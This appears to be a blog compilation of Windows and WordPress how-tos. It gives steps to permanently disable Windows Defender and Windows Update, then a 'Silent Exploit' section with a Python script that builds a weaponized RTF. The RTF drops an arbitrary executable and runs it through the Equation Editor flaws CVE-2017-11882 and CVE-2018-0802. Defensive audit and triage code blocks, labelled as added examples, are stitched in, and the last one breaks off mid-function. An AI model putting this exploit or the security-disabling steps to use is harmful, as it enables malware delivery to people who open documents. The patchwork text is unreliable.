How to find the MAC Address of Computer in Your Network

I previously explained how to find the MAC address of a computer outside your subnet; read it HERE if you missed it.

Now I want to show how to list the IP addresses and MAC addresses on your subnet.

Here is how it's done.

  • Open CMD (as administrator or normally).
  • Ping an IP in your subnet by typing, for example, “ping 10.18.2.34” without the quotes.
  • Hit Enter.
  • Then type “ARP -A” without the quotes and hit Enter.

This lists the IP and MAC address of every device on your subnet that your PC currently has in its ARP cache.

How to find the MAC Address of Remote Computer/IP Address

The MAC address is used by the network hardware such as routers, switches, etc. to send traffic from one device to another device on your network.

Sometimes you need to find the MAC address of a remote PC when you only know its IP address; I have been in this situation several times while troubleshooting or taking inventory.

Here is how it's done.

  • Open CMD (normally or as administrator).
  • In CMD type: getmac /s “IP Address”

That is: getmac, a space, /s, a space, then the IP address of the PC, without the quotes.

  • Hit Enter

You will be presented with the MAC Address of that PC or device.

NOTE: If you get the error “ERROR: The RPC server is unavailable.”, the PC might not be connected to the network at that moment.

THIS TECHNIQUE FINDS THE MAC ADDRESS OF PCs OUTSIDE YOUR SUBNET.

How to permanently disable Windows Defender in Windows 10

I would suggest that if you’re *NOT* a computer geek, there is *no way* you should be permanently disabling Windows Defender.

PLEASE DO NOT ATTEMPT IF YOU ARE UNSURE WHAT YOU ARE DOING!!!

How to disable Windows Defender using Local Group Policy

If you’re running Windows 10 Pro, Enterprise, or Education, you can use the Local Group Policy Editor to disable Windows Defender Antivirus on your computer permanently using these steps:

  1. Use the Windows key + R keyboard shortcut to open the Run command.
  2. Type gpedit.msc and click OK to open the Local Group Policy Editor.
  3. Browse the following path: Computer Configuration > Administrative Templates > Windows Components > Windows Defender Antivirus
  4. On the right, double-click the Turn off Windows Defender Antivirus policy.
  5. Select the Enabled option to disable Windows Defender.
  6. Click Apply.
  7. Click OK.

Once you’ve completed the steps, restart your computer to apply the changes.

You’ll notice that the shield icon will remain in the taskbar notification area, but that’s because the icon is part of the Windows Defender Security Center and not part of the antivirus.

At any time, you can enable the Windows Defender Antivirus again using the steps, but on step No. 5, make sure to select the Not Configured option. Then reboot your device to apply the changes.

How to disable Windows Defender using the Registry

Alternatively, if you’re running Windows 10 Home, you won’t have access to the Local Group Policy Editor. However, you can modify the registry to permanently disable the default antivirus using these steps:

Warning: This is a friendly reminder that editing the Registry is risky, and it can cause irreversible damage to your installation if you don’t do it correctly. It’s recommended to make a full backup of your PC before proceeding.

  1. Use the Windows key + R keyboard shortcut to open the Run command.
  2. Type regedit, and click OK to open the Registry.
  3. Browse the following path: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender

    Quick Tip: You can copy and paste the path into the Registry editor's address bar to jump straight to the key.

  4. If you don’t see the DisableAntiSpyware DWORD, right-click the Windows Defender (folder) key, select New, and click on DWORD (32-bit) Value.
  5. Name the value DisableAntiSpyware and press Enter.
  6. Double-click the newly created DWORD and set the value from 0 to 1.
  7. Click OK.

After completing the steps, restart your device to apply the settings, and then the Windows Defender Antivirus should now be disabled.

If you no longer want to keep the security feature disabled, you can enable it again using the same steps, but on step No. 6, make sure to right-click the DisableAntiSpyware DWORD and select the Delete option.

How to disable Windows 10 automatic updates

Whenever you are faced with Windows 10’s automatic update notification like:

  • Install updates automatically
  • Download Updates but choose when to install them
  • Check for updates but let me choose whether to download and install them

What would you do? Here, we have the following solutions.

Option 1: Stop The Windows Update Service

As central as it is to Windows 10, Windows Update is actually just another Windows service, so it can be stopped with these simple steps:

    1. Open the Run command (Win + R), in it type: services.msc and press enter
    2. From the Services list which appears find the Windows Update service and open it
    3. In ‘Startup Type’ (under the ‘General’ tab) change it to ‘Disabled’
    4. Restart

To re-enable Windows Update, simply repeat these four steps but change the Startup Type back to ‘Automatic’.
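Both changes above (the DisableAntiSpyware policy value from the Windows Defender section and the disabled Windows Update service from Option 1) leave a machine silently unprotected, so it is worth being able to spot them from the command line. The following added example (not part of the original post) parses the output of two real commands, `reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware` and `sc qc wuauserv`, and reports which of the two settings is in its weakened state. The two sample outputs are constructed to show the weakened state; the audit strings and thresholds are my own.

```python
import re

# Constructed sample of "reg query ... /v DisableAntiSpyware" with the value set to 1.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
    DisableAntiSpyware    REG_DWORD    0x1
"""

# Constructed sample of "sc qc wuauserv" after the Startup Type was set to Disabled.
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: wuauserv
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 4   DISABLED
        ERROR_CONTROL      : 1   NORMAL
"""

# "<name>  REG_<type>  <data>" lines printed by reg query
REG_VALUE_RE = re.compile(r"^\s*(\S+)\s+(REG_\w+)\s+(\S+)\s*$")
# "START_TYPE : 4 DISABLED" line printed by sc qc
START_TYPE_RE = re.compile(r"^\s*START_TYPE\s*:\s*(\d+)\s+(\w+)", re.M)


def parse_reg_query(text):
    """Map value name -> (registry type, raw data string) from 'reg query' output."""
    values = {}
    for line in text.splitlines():
        m = REG_VALUE_RE.match(line)
        if m:
            values[m.group(1)] = (m.group(2), m.group(3))
    return values


def defender_disabled_by_policy(reg_query_text):
    """True when DisableAntiSpyware exists as REG_DWORD and equals 1."""
    entry = parse_reg_query(reg_query_text).get("DisableAntiSpyware")
    if entry is None:
        return False
    kind, raw = entry
    return kind == "REG_DWORD" and int(raw, 16) == 1     # reg query prints DWORDs as 0x...


def windows_update_start_type(sc_qc_text):
    """Return the symbolic START_TYPE (AUTO_START, DEMAND_START, DISABLED) or None."""
    m = START_TYPE_RE.search(sc_qc_text)
    return m.group(2) if m else None


def audit(reg_query_text, sc_qc_text):
    """Return a list of human-readable findings; an empty list means both settings are intact."""
    findings = []
    if defender_disabled_by_policy(reg_query_text):
        findings.append("Windows Defender Antivirus is turned off by policy (DisableAntiSpyware=1); "
                        "delete the value and reboot to restore it")
    if windows_update_start_type(sc_qc_text) == "DISABLED":
        findings.append("Windows Update service (wuauserv) is Disabled; "
                        "set its Startup Type back to Automatic to receive security updates")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_REG_QUERY, SAMPLE_SC_QC):
        print("[!] " + finding)
```

On a real host, capture the two commands' output with `subprocess.run([...], capture_output=True, text=True).stdout` and pass the strings to `audit()`; a missing DisableAntiSpyware value is reported as "not disabled", which is the default state.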

Option 2: Set Up A Metered Connection

Windows 10 offers users on metered connections a compromise: to save bandwidth Microsoft confirms the operating system will only automatically download and install updates it classifies as ‘Priority’.

While Microsoft doesn’t reveal its method of classification, this does cut down more frivolous updates which typically include new drivers and software features – both of which have already caused stability problems.

  1. Open the Settings app (Win + I)
  2. Open the ‘Network & Internet’ section
  3. Open ‘Wi-Fi’ and click ‘Advanced Options’
  4. Toggle ‘Set as metered connection’ to ‘On’

Note: If your PC uses an Ethernet cable to connect to the Internet the Metered Connection option will be disabled as it works with Wi-Fi connections only (silly I know).

Windows 10 is the single operating system working across all Microsoft desktops, laptops, tablets and phones

Option 3: Group Policy Editor

This is a halfway house: the Group Policy Editor will notify you about new updates without automatically installing them (how previous generations of Windows always worked), though again security updates will still install automatically.

Note: Windows 10 Home users have to sit this one out, it is only for Windows 10 Education, Pro and Enterprise editions.

  1. Open the Run command (Win + R), in it type: gpedit.msc and press enter
  2. Navigate to: Computer Configuration -> Administrative Templates -> Windows Components -> Windows Update
  3. Open this and change the Configure Automatic Updates setting to ‘2 – Notify for download and notify for install’
  4. Open the Settings app (Win + I) and navigate to -> Update and Security -> Windows Updates. Click ‘Check for updates’ which applies the new configuration setting
  5. Restart

How To Switch Back To Old WordPress Classic Editor

WordPress 5 was released only a few days ago. Many blogs and websites (including ValueWalk) have successfully upgraded to the new version. WordPress 5 brings a lot of changes, including a new Gutenberg editor that replaces the good old Classic Editor that we have been using for years.

What you need to know about Gutenberg

Gutenberg is a sleek and modern block-based editor that completely alters the way posts and pages are created. But it’s still in its early days. Some bloggers and writers don’t like it because they are not familiar with it while others think the block-based editor is way more complex than the classic editor. Here we will talk about how you can disable the Gutenberg editor and get back the Classic Editor.

Fortunately, Gutenberg does not affect your published content. Folks at GoDaddy tested it with more than a hundred websites and there was no difference in live posts and pages after updating to WordPress 5.

The posts and pages created prior to the rollout of Gutenberg will appear in a Classic block, which is marked by a “Classic” heading. You can convert the Classic block into multiple blocks via the blocks menu by clicking on the three dots.

While the old classic editor had a clean writing area similar to Microsoft Word, the Gutenberg editor has blocks for paragraphs, images, videos, headings, and plugins. Depending on the WordPress theme you have, you can style the editor to look like the published page.

Early reports suggest that users have encountered random bugs while working in Gutenberg editor. The Gutenberg plugin has a disappointing 2.3 out of 5 rating. It will take developers some time to fix the bugs and enhance the user experience. Until then, you can disable Gutenberg in WordPress 5 and switch back to the Classic Editor.

How to go back to the Classic Editor in WordPress 5

Yes, the WordPress team allows you to disable Gutenberg and switch back to the Classic Editor. And they have made it pretty simple. Here’s how to do it:

STEP-1: Log in to your WordPress site as an administrator and go to Plugins > Add Plugin

STEP-2: Search for Classic Editor in the WordPress plugin repository. You’ll see the Classic Editor plugin near the top of the search results. It is developed and maintained by the core WordPress contributors. Alternatively, you can download it from here

STEP-3: Click on Install Now and once it’s installed, activate the plugin. It will automatically disable the Gutenberg editor in WordPress 5 when you activate it

STEP-4: Now go to Settings > Writing to optimize the Classic Editor settings to your liking. You can also choose to keep both the Classic and Gutenberg editors. After changing the settings, hit the Save Changes button near the bottom of the page.

That’s it! Now you can create new posts using the Classic Editor. You will also be able to edit older posts and pages using the classic one.

It’s worth pointing out that Gutenberg editor is the future of WordPress and it’s here to stay. The WordPress team will continue to support the Classic Editor through the end of 2021, giving you plenty of time to get familiar with Gutenberg.

Even if some themes and plugins face issues with the new editor, we expect developers to address the problems in the coming months. The core WordPress team is giving developers of third-party plugins, themes and tools the time they need to add compatibility with Gutenberg.

Once you are ready to use the block-based editor, you can enable it from Settings. Or you can uninstall the Classic Editor plugin altogether.

How to use two themes in one WordPress installation

There are several ways you can set up multiple themes. The first option allows you to set a different theme for your site’s homepage: simply choose a theme from the dropdown menu and click the Save All Changes button. The second option is to match pages by a full URL, a URL prefix, or a URL containing an asterisk wildcard.

One easy way to do this is with the “Multiple Themes” plugin.

Multiple themes plugin for WordPress

Installing “Multiple Themes”

Multiple Themes is a comprehensive and yet easy to use add-on for your WordPress site that allows you to create any number of rules to implement not just a second theme, but a third and a fourth if you so choose. In principle, you can use it to display a new theme for every category page and post.

After downloading and installing the plug-in, you can access its settings from the left-hand side of the WordPress dashboard in the submenu section as shown here:

multiple themes plugin

In this example, I’m going to apply a new theme to the “technology” category of my site. This includes not only the archive for the category, but also the individual posts themselves. Once inside the settings area, scroll down until you see the section called “Select here if URL is a prefix”.

create rule with new theme

As shown in the screenshot above, we require three parameters to define our rule. Since I want to target all posts and archives in the “technology” category, I use a wildcard “*” to create a rule covering the category archive and all future page numbers. For this kind of rule, the archive page has “technology” in the third segment of the URL, so that’s the only concrete thing to specify.

In addition to that, I also have to specify which theme I want to use for posts and pages that match the expression. In this example, I’ve simply chosen to use the default TwentySixteen.

Once you save your changes, the rule is added to the predefined list and you can repeat this process so that you have multiple rules targeting different sets of pages. In the screenshot below, you can see that I’ve created yet another rule selecting actual posts and pages belonging to the “technology” category.

multiple rules

Finally, it’s time to test the whole thing. If my rule sets have been accurately defined, my technology pages and posts should now use a new theme. You can see in the screenshot below, that this is exactly what has happened:

new theme activated

This simple operation should be sufficient for most of your multiple-theme requirements. However, the plug-in also allows you to create more advanced rule sets that change the default theme altogether. You can also isolate pages based on query parameters for more complex interactions. In short, the “Multiple Themes” plug-in is a Swiss Army knife for every situation that calls for displaying a different theme.
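The rule kinds the section describes (homepage only, exact full URL, URL prefix, URL with an asterisk) are easy to reason about once you see how a request URL is tested against them. The following added example is my own illustration of that matching, not code from the Multiple Themes plug-in; the precedence (exact URL beats prefix or wildcard, which beat the homepage rule, longer patterns win ties) and the site `https://example.com` with its theme names are assumptions, and query strings are deliberately ignored because the plug-in's query-parameter rules are not covered here.

```python
import fnmatch
from urllib.parse import urlsplit

# A rule is (kind, pattern, theme). Kinds follow the page's options; "home"
# ignores its pattern and matches only the site root.
SAMPLE_RULES = [
    ("home", "https://example.com/", "twentyseventeen"),
    ("wildcard", "https://example.com/category/technology/*", "twentysixteen"),
    ("wildcard", "https://example.com/*/technology/*", "twentysixteen"),
    ("prefix", "https://example.com/docs/", "twentyfifteen"),
    ("full", "https://example.com/docs/legacy/", "twentyfourteen"),
]

# Assumed precedence when several rules match the same URL.
SPECIFICITY = {"full": 3, "wildcard": 2, "prefix": 2, "home": 1}


def _normalize(url):
    """Lower-case scheme and host, default the path to '/', drop query and fragment."""
    parts = urlsplit(url)
    return "%s://%s%s" % (parts.scheme.lower(), parts.netloc.lower(), parts.path or "/")


def rule_matches(rule, url):
    """Test one rule against one request URL."""
    kind, pattern, _theme = rule
    u = _normalize(url)
    if kind == "home":
        return urlsplit(u).path == "/"
    if kind == "full":
        return u == _normalize(pattern)
    if kind == "prefix":
        return u.startswith(_normalize(pattern))
    if kind == "wildcard":
        # '*' in fnmatch also crosses '/', so 'technology/*' covers /page/2/ as well
        return fnmatch.fnmatchcase(u, _normalize(pattern))
    raise ValueError("unknown rule kind: %r" % (kind,))


def select_theme(rules, url, default_theme):
    """Pick the most specific matching rule's theme, or the site default if none match."""
    best = None
    for rule in rules:
        if rule_matches(rule, url):
            score = (SPECIFICITY[rule[0]], len(rule[1]))
            if best is None or score > best[0]:
                best = (score, rule[2])
    return best[1] if best else default_theme


if __name__ == "__main__":
    for test_url in ("https://example.com/",
                     "https://example.com/category/technology/page/2/",
                     "https://example.com/2018/technology/my-post/",
                     "https://example.com/docs/legacy/",
                     "https://example.com/contact/"):
        print("%-50s -> %s" % (test_url, select_theme(SAMPLE_RULES, test_url, "twentytwenty")))
```

Listing every URL shape your site produces and running it through `select_theme()` before saving rules in the plug-in is a cheap way to catch a wildcard that is broader than intended.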

Silent Exploit – Exploiting Microsoft eqnedt32.exe

Enough of the patches, Microsoft; we believe it's time to bury the good old Equation Editor extension. Unless I'm working for Texas Instruments or NASA I don't need it, and if your organization is still patching the Equation extension, I'm sorry, but you are highly exposed. Every patch released so far has had an exploitable hole. I will detail these holes and exploits.

Although Microsoft replaced the old EQNEDT32.EXE component with a new one in 2007, the older file is still included with all Office installations so that users can load and edit equations created with the old component.

You can check if you are running the Equation Extension by navigating here:

C:\Program Files\Common Files\microsoft shared\EQUATION

If there is an EQUATION folder in your Microsoft shared folder, you might be at risk. You can delete the folder if you have no need for it; if your organization is not Texas Instruments, you can advise them to do the same.

Vulnerability According to Threat Post

Microsoft on Tuesday patched a 17-year-old remote code execution bug found in an Office executable called Microsoft Equation Editor. The vulnerability (CVE-2017-11882) was patched as part of Microsoft’s November Patch Tuesday release of 53 fixes.

While Microsoft rates the vulnerability only as “Important” in severity, researchers at Embedi who found the bug, call it “extremely dangerous.”

In a report released Tuesday (PDF) by Embedi, researchers argue the vulnerability is a threat because all versions of Microsoft Office for the past 17 years are vulnerable and the CVE “works with all the Microsoft Windows versions (including Microsoft Windows 10 Creators Update).”

The Microsoft Equation Editor is installed by default with the Office suite. The application is used to insert and edit complex equations as Object Linking and Embedding (OLE) items in Microsoft Word documents.

The origins of Equation Editor date back to November 2000 when it was compiled. Since then, it has been part of Office 2000 through Office 2003. Researchers said in 2007 the component was replaced with a newer version. But, the old Equation Editor was left in Office to support files that utilized the old OLE-based (EQNEDT32.EXE) equations.

Further analysis by Embedi revealed that the EQNEDT32.EXE was unsafe because when executed, it ran outside of Office and didn’t benefit from many of the Microsoft Windows 10 and Office security features such as Control Flow Guard.

“The component is an OutProc COM server executed in a separate address space. This means that security mechanisms and policies of the office processes (e.g. WINWORD.EXE, EXCEL.EXE, etc.) do not affect exploitation of the vulnerability in any way, which provides an attacker with a wide array of possibilities,” Embedi wrote in its technical write-up.

Embedi researchers discovered the error using Microsoft’s own BinScope tool, which identified EQNEDT32.EXE as a vulnerable executable. BinScope works by analyzing files to see if they pass standards set by Microsoft’s Security Development Lifecycle, a core element of Microsoft’s Trustworthy Computing.

Embedi exploited this vulnerability using two buffer overflows that relied on several OLEs. “By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g. to download an arbitrary file from the Internet and execute it),” researchers said.

Microsoft describes the CVE-2017-11882 as a Microsoft Office memory corruption vulnerability. “Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Office or Microsoft WordPad software. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file,” Microsoft wrote.

As part of its research, Embedi created a proof-of-concept exploit that attacks all versions of Office dating back to 2000, including Office 365, running on Windows 7, Windows 8.1, and the Windows 10 Creators Update. In a video below, Embedi shows three different attacks on Office and Windows versions (Office 2010 on Windows 7, Office 2013 on Windows 8.1, and Office 2016 on Windows 10).

Along with downloading the patch to fix Equation Editor, Embedi is recommending companies disable EQNEDT32.EXE in the Windows registry to prevent further exploitation.

“Because the component has numerous security issues and the vulnerabilities it contains can be easily exploited, the best option for a user to ensure security is to disable registering of the component in Windows registry,” researchers wrote.

Understanding the exploit approach

The CVE-2017-11882 vulnerability happened because the EQNEDT32.EXE would allocate a fixed size of memory and load a font name inside. If the font name was too long, it would trigger a buffer overflow and allow attackers to execute malicious code.

0patch says it found fixes for this problem (checks to verify and truncate the font's name) but also other modifications in unrelated parts of the binary.

“There are six such length checks in two modified functions, and since they don’t seem to be related to fixing CVE-2017-11882, we believe that Microsoft noticed some additional attack vectors that could also cause a buffer overflow and decided to proactively patch them,” 0patch said.

In addition, Microsoft optimized other functions, and where the modifications made a function smaller it added padding so as not to disturb the layout of the neighbouring functions.

Such efforts to avoid breaking the EQNEDT32.EXE binary are time-consuming, and no sane developer would take this route if they still had access to the source code. Furthermore, Microsoft also changed the binary's version number by manually editing the binary.

All the clues point to the conclusion that Microsoft lost access to the EQNEDT32.EXE source code, which, considering the amount of software the company has managed over the last 42 years, is a wonder has not happened a few more times before.

“Maintaining a software product in its binary form instead of rebuilding it from modified source code is hard. We can only speculate as to why Microsoft used the binary patching approach, but being binary patchers ourselves we think they did a stellar job,” the 0patch team said.

It's Not Over Yet!!!

Recently I have come across malware utilizing the CVE-2018 variants; as the patches keep coming the exploits keep evolving, and with a simple tweak to the Python code you can have a script exploiting several versions of the patches.

Proof of exploit

This is a Silent Exploit Python script that encodes an executable and writes it into an RTF document file; when the document is opened it executes the binary via the EQNEDT32.EXE memory buffer vulnerability.

# Python 2 script as published (uses str.encode('hex') and the print statement).
import argparse
import os
import struct


class Package(object):
    """
    Packager spec based on:
    https://phishme.com/rtf-malware-delivery/

    Dropping method by Haifei Li:
    Dropping Files Into Temp Folder Raises Security Concerns
    Found being used itw by @MalwareParty:
    """

    def __init__(self, filename):
        self.filename = os.path.basename(filename)
        self.fakepath = 'C:\\fakepath\\{}'.format(self.filename)
        self.orgpath = self.fakepath
        self.datapath = self.fakepath
        with open(filename, 'rb') as f:
            self.data = f.read()
        self.OBJ_HEAD = r"{\object\objemb\objw1\objh1{\*\objclass Package}{\*\objdata "
        self.OBJ_TAIL = r"0105000000000000}}"

    def get_object_header(self):
        OLEVersion = '01050000'
        FormatID = '02000000'
        ClassName = 'Package'
        szClassName = struct.pack("<I", len(ClassName) + 1).encode('hex')
        szPackageData = struct.pack("<I", len(self.get_package_data()) / 2).encode('hex')
        return ''.join([
            OLEVersion,
            FormatID,
            szClassName,
            ClassName.encode('hex') + '00',
            '00000000',
            '00000000',
            szPackageData,
        ])

    def get_package_data(self):
        StreamHeader = '0200'
        Label = self.filename.encode('hex') + '00'
        OrgPath = self.orgpath.encode('hex') + '00'
        UType = '00000300'
        DataPath = self.datapath.encode('hex') + '00'
        DataPathLen = struct.pack("<I", len(self.datapath) + 1).encode('hex')
        DataLen = struct.pack("<I", len(self.data)).encode('hex')
        Data = self.data.encode('hex')
        OrgPathWLen = struct.pack("<I", len(self.datapath)).encode('hex')
        OrgPathW = self.datapath.encode('utf-16le').encode('hex')
        LabelLen = struct.pack("<I", len(self.filename)).encode('hex')
        LabelW = self.filename.encode('utf-16le').encode('hex')
        DefPathWLen = struct.pack("<I", len(self.orgpath)).encode('hex')
        DefPathW = self.orgpath.encode('utf-16le').encode('hex')
        return ''.join([
            StreamHeader,
            Label,
            OrgPath,
            UType,
            DataPathLen,
            DataPath,
            DataLen,
            Data,
            OrgPathWLen,
            OrgPathW,
            LabelLen,
            LabelW,
            DefPathWLen,
            DefPathW,
        ])

    def build_package(self):
        return self.OBJ_HEAD + self.get_object_header() + self.get_package_data() + self.OBJ_TAIL


RTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Riched20 6.3.9600}\viewkind4\uc1
\pard\sa200\sl276\slmult1\f0\fs22\lang9"""

RTF_TRAILER = R"""\par}
"""

OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """

# The three hex templates below are truncated in the original post.
OBJECT_TRAILER = R""" }{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
0000000102ffffff00050000002e01
--------TRUNCATED-------"""

OBJDATA_TEMPLATE_0802 = R"""
01050000020000000B0000004571756174696F6E2E33000000000000000000000E0000D0CF11E0A1
B11AE1000000000000000000000000000000003E000300FEFF090006000000000000000000000001
0000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFF
-------TRUNCATED---------"""

OBJDATA_TEMPLATE_11882 = R"""
01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1
b11ae1000000000000000000000000000000003e000300feff090006000000000000000000000001
0000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffff
ffffffffffff
-------TRUNCATED--------"""


def create_ole_exec_primitive(command, objdata_template, command_offset, max_len):
    if len(command) > max_len:
        raise ValueError("primitive command must be shorter than %d bytes" % max_len)
    hex_command = command.ljust(max_len).encode("hex")
    objdata_hex_stream = objdata_template.translate(None, "\r\n")
    ole_data = (objdata_hex_stream[:command_offset] + hex_command +
                objdata_hex_stream[command_offset + len(hex_command):])
    return OBJECT_HEADER + ole_data + OBJECT_TRAILER


def create_rtf(header, trailer, executable, double):
    # CVE-2018-0802 exploit
    ole1 = create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)),
                                     OBJDATA_TEMPLATE_0802, (0xd12 * 2), 126)
    p = Package(executable)
    package = p.build_package()
    outbuf = header + package + ole1
    if double:
        # CVE-2017-11882 exploit
        outbuf += create_ole_exec_primitive("cmd.exe /c%tmp%\\{}".format(os.path.basename(executable)),
                                            OBJDATA_TEMPLATE_11882, (0x949 * 2), 43)
    return outbuf + trailer


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="PoC for CVE-2018-0802 using Packager.dll file drop method")
    parser.add_argument("-e", "--executable", help="File to embed and exec", required=True)
    parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
    parser.add_argument('-d', "--double",
                        help="Double-whammy! Exploits both CVE-2018-0802 and CVE-2017-11882 in the same document.",
                        action="store_true")
    args = parser.parse_args()
    with open(args.output, 'w') as f:
        f.write(create_rtf(RTF_HEADER, RTF_TRAILER, args.executable, args.double))
    print "[+] Completed!"
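The document the script above produces has two tell-tale features that a defender can look for without running anything: an embedded object whose class is Package (the file dropper) and one whose class is Equation.3 (the EQNEDT32.EXE trigger), the latter carrying \objupdate so it loads as soon as the document opens. The following added example (my own triage code, not from the original post or from the PoC) walks an RTF file's text for \object groups, reads each object's class and flags, and reports the risky ones; it also includes a check for the EQUATION folder path given earlier on the page. The sample RTF is constructed and carries no payload. Real malicious RTFs often obfuscate control words, so treat this as a first-pass filter, not a replacement for a full RTF parser or your antivirus.

```python
import os
import re

# Constructed sample RTF fragment: one Package object and one Equation.3 object
# with \objupdate set. The \objdata hex here is a harmless placeholder.
SAMPLE_RTF = r"""{\rtf1\ansi\deff0{\fonttbl{\f0\fnil Calibri;}}
\pard Hello\par
{\object\objemb\objw1\objh1{\*\objclass Package}{\*\objdata 0105000002000000}}
{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 0105000002000000}}
\par}"""

# Matches "{\object<flags>{\*\objclass <name>}" where <flags> is a run of control words.
OBJECT_RE = re.compile(r"\{\\object(?P<flags>(?:\\\w+)*)\{\\\*\\objclass\s+(?P<cls>[^}]+)\}")

# Object classes worth flagging, keyed lower-case, with the reason reported.
RISKY_CLASSES = {
    "equation.3": "Equation Editor (EQNEDT32.EXE) OLE object, the component hit by CVE-2017-11882 / CVE-2018-0802",
    "package": "Packager object, which can drop an embedded file into %TEMP% when the document is opened",
}


def find_embedded_objects(rtf_text):
    """Return one dict {class, auto_update, offset} per embedded object found."""
    objects = []
    for m in OBJECT_RE.finditer(rtf_text):
        flags = set(re.findall(r"\\([a-z]+)", m.group("flags")))
        objects.append({
            "class": m.group("cls").strip(),
            "auto_update": "objupdate" in flags,   # loads on open without user interaction
            "offset": m.start(),
        })
    return objects


def triage(rtf_text):
    """Return (class, reason) pairs for every risky embedded object in the RTF text."""
    findings = []
    for obj in find_embedded_objects(rtf_text):
        reason = RISKY_CLASSES.get(obj["class"].lower())
        if reason is None:
            continue
        if obj["auto_update"]:
            reason += "; \\objupdate forces the object to load when the document opens"
        findings.append((obj["class"], reason))
    return findings


def triage_file(path):
    """Read an .rtf from disk (RTF is 7-bit text, so latin-1 never fails) and triage it."""
    with open(path, "r", encoding="latin-1") as f:
        return triage(f.read())


def equation_editor_installed(common_files=r"C:\Program Files\Common Files"):
    """True when the legacy Equation Editor folder from the page is present on this host."""
    return os.path.isdir(os.path.join(common_files, "microsoft shared", "EQUATION"))


if __name__ == "__main__":
    for cls, reason in triage(SAMPLE_RTF):
        print("[!] %s: %s" % (cls, reason))
    print("legacy Equation Editor folder present: %s" % equation_editor_installed())
```

Run `triage_file()` over an email gateway's quarantined .rtf and .doc-named attachments (many of the latter are really RTF); a Package object next to an Equation.3 object with \objupdate is the exact shape the script above produces.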

Emotet Trojan threat profile

Emotet is a banking trojan, first detected by Trend Micro in 2014, used to steal bank account details by intercepting network traffic. A second version was identified in the fall of 2014 using the Automatic Transfer System (ATS) to steal money automatically from victims’ bank accounts. It had a modular structure, including an installation module, banking module, spam bot module, a module for stealing address books from MS Outlook, and a module for organizing distributed denial-of-service (DDoS) attacks. The attackers attempted to remain under the radar by using Emotet in targeted attacks against a small number of German and Austrian banks and changing the domain name of the ATS server daily. In January 2015, a third version of Emotet emerged targeting Swiss banks and containing additional features designed to help it evade detection. This version featured a new built-in public RSA key and it partially cleaned ATS scripts of debugging information and comments. It alters its behaviour if it detects the presence of a virtual machine and uses a different, fake address list for the command centers to mislead investigators.

Emotet is delivered via spam emails containing malicious attachments or links. The attached files are usually ZIP archives that contain the Emotet loader. The file names typically have many characters in an attempt to hide the .exe extension from the recipient. The trojan file is packed by a cryptor, used to avoid detection by antivirus software. When the file is processed by the cryptor, control is transferred to the Emotet loader. It then embeds itself in the system, links with the command server, downloads additional modules, and runs them. It consolidates itself in the system and obtains a list of running processes. Emotet then locates the explorer.exe process, unpacks its main code, and injects itself into it.

In mid-2015, a new version was identified. The trojan’s new capabilities included evading two-factor authentication. It uses web injects to display fake alerts to the victims during online banking sessions, requesting a Chip Transaction Authentication Number (TAN) or SMS TAN from the user to complete a “test transfer.” The malicious script then carries out a real financial transfer from the victim’s account to the attacker’s identified account. The user confirms the transfer using the Chip TAN or SMS TAN. This attack can only be accomplished with user interaction; effective social engineering training can help prevent victimization.
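The delivery detail above, a ZIP attachment whose member has a very long name so the .exe extension scrolls out of view, is simple to check for at a mail gateway before the archive reaches a user. The following added example (my own, not from the profile above) builds a constructed ZIP in memory with one such member, then inspects every member for an executable extension, a double extension, an unusually long name, and an MZ header regardless of what the name says. The extension list, the 60-character threshold and the file names are assumptions of mine; the sample contains only an "MZ" marker followed by zero bytes, not a real program.

```python
import io
import os
import zipfile

# Extensions Windows will execute directly when double-clicked (assumed list).
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".dll", ".js", ".jse",
                   ".vbs", ".vbe", ".wsf", ".bat", ".cmd", ".ps1"}


def build_sample_zip():
    """Constructed ZIP: one long-named .pdf.exe member with an MZ header, one plain text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("Payment_Notification_Invoice_Details_Reference_Copy_Attached_Document_Scan.pdf.exe",
                   b"MZ" + b"\x00" * 64)         # placeholder bytes, not a real executable
        z.writestr("notes.txt", b"plain text")
    return buf.getvalue()


def inspect_zip_attachment(zip_bytes, long_name_threshold=60):
    """Return [(member name, [reasons])] for every member that trips at least one check."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            base = os.path.basename(info.filename)
            root, ext = os.path.splitext(base)
            reasons = []
            if ext.lower() in EXECUTABLE_EXTS:
                reasons.append("executable extension %s" % ext.lower())
            if os.path.splitext(root)[1]:
                reasons.append("double extension (%s%s)" % (os.path.splitext(root)[1], ext))
            if len(base) > long_name_threshold:
                reasons.append("very long file name (%d chars)" % len(base))
            with z.open(info) as member:       # read only the first two bytes, never the whole file
                if member.read(2) == b"MZ":
                    reasons.append("MZ header: Windows executable regardless of name")
            if reasons:
                findings.append((base, reasons))
    return findings


def is_suspicious(zip_bytes):
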